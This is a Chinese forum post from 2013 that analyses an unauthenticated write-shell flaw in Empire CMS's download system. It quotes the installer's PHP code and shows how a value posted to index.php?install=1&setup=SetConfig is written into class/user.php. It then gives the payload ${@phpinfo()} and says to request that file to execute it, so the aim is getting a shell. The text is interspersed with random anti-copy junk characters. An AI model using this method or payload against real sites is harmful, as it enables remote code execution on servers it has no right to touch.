这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们" P5 A7 X" a- }2 J! i
9 m9 K/ V. @* |% r
: r2 v. w S# p! ~这是帝国的一套下载系统 如图% l$ ^1 G/ _. c' q5 ?$ H" e
ps(不需要任何账户和密码,直接写shell)
0 E% f: y" Y( g$ O1 `$ Q8 c- i4 u由于很多站是由于下载要整合discuz 等等一些论坛....
) e) r5 b# B# i: R: H : j4 R1 n* b$ [, Y% c/ M- U
而帝国他又有一个万能接口,如图
6 B$ m/ ]: w$ W- _# f
. d3 i, p8 ^' F. {3 O' L; {: q3 O% R# u8 s |' H! d
而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码, y( g5 A; g7 H$ J
' D4 N% |7 n4 [当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪# g; R* V2 }' H/ i Z( a
7 ^! U) c) n" l在data/fun.php中的15行
@' q; Z+ q( Q
7 a/ k1 M1 q; Q5 [2 Z我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {; R+ Z/ M: R1 C7 l% T2 ~
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干
) C& d5 W* L \1 o3 `, q% G) ^. G* y
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);1 }% [# U& s3 K% D
, q- x1 |7 v6 E" O: l% C他将传进来的变量进行了切割,然后赋给了$filetext
/ R4 k- Z; S" ?4 o
" d7 {$ ^6 I n8 L" n/ D然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了
9 U$ S9 M- ?# Z
1 e! P/ Y( w% _7 g* l我们看看写入的结果,随便填一个 3 @2 f4 |2 V: t' M$ Q
! \3 Y, T; c4 o* I2 K
- u) ^. X/ G* ]* D" \. s0 _
3 q+ J- i9 ? {0 j
% a# o* I! ^" s+ P: n' A
' O! @$ r; Q9 W
( Z; R5 {6 z$ p6 [( {$ o8 r
# ^1 b* s7 m2 y0 R( F/ c7 b/ K' k7 l" h* ?# n
% }0 C3 I. I8 j8 l( k& b" W7 S1 B2 M
/ D" U) u$ b# H, }" ~
4 s( g) ]7 g8 @' z
' D4 P) b3 \% V& k! R/ B0 U
h- ]& I3 W; P6 X4 w" \- k' j4 T
8 F: S7 \; E/ l5 r+ k- E! }4 c8 S9 j7 r* n# U4 r \
C" S+ s- e5 X2 s Y' u
& C1 l* {; a4 ^( u
& f E$ D& o8 ~+ l, O( H9 A
& [0 U A" o. T7 V7 a h8 d" ?8 y1 l1 e' q) V
所以我们淫荡点,写个${@phpinfo()}试试
0 C2 B$ _9 C4 `* [% F然后访问以下class/user.php这个文件
" ~8 k9 |* o4 L! P日了吧
/ @2 d+ O% J; o0 J) }8 p' K# [2 m5 ?' ?3 ]
3 M2 C( h' J. V, V' }( i$ M% [& C4 J
- G3 W3 L+ v: N9 V
) ]+ r' r% u4 p; ]9 V; D* E) }6 ~6 o | 
发表于 2013-1-23 09:34:37
收藏
支持
反对